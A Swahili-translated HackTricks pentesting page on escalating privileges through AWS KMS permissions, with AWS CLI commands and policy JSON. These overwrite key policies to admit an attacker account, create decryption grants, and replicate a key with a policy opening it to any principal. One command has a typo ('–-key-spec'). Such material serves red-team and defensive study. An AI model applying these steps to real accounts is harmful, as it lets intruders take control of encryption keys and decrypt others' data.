Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - KMS Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

KMS

Kwa habari zaidi kuhusu KMS angalia:

pageAWS - KMS Enum

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

Kwa idhini hizi ni inawezekana kubadilisha ruhusa za ufikiaji kwa ufunguo ili uweze kutumiwa na akaunti nyingine au hata mtu yeyote:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}

kms:CreateGrant

Inaruhusu mwakilishi kutumia ufunguo wa KMS:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

Ruhusa inaweza kuruhusu aina fulani za shughuli: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

Tafadhali kumbuka kwamba inaweza kuchukua dakika chache kwa KMS kuruhusu mtumiaji kutumia funguo baada ya ruhusa kuundwa. Baada ya muda huo kupita, mwakilishi anaweza kutumia funguo la KMS bila haja ya kufafanua chochote. Hata hivyo, ikiwa ni lazima kutumia ruhusa mara moja tumia ishara ya ruhusa (angalia msimbo ufuatao). Kwa majaribio zaidi soma hii.

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

Tafadhali elewa kwamba inawezekana kuorodhesha ruzuku za funguo kwa:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

Kwa idhini hizi, ni kawaida kuzalisha ufunguo wa KMS ulio na uwezo wa mikoa mingi katika eneo tofauti na sera tofauti.

Hivyo, mshambuliaji anaweza kutumia hili kujipandisha cheo cha upatikanaji wake kwa ufunguo na kutumia hilo

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

kms:Decrypt

Haki hii inaruhusu kutumia ufunguo kufichua baadhi ya taarifa. Kwa maelezo zaidi angalia:

pageAWS - KMS Post Exploitation
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - IAM PrivescNextAWS - Lambda Privesc

Last updated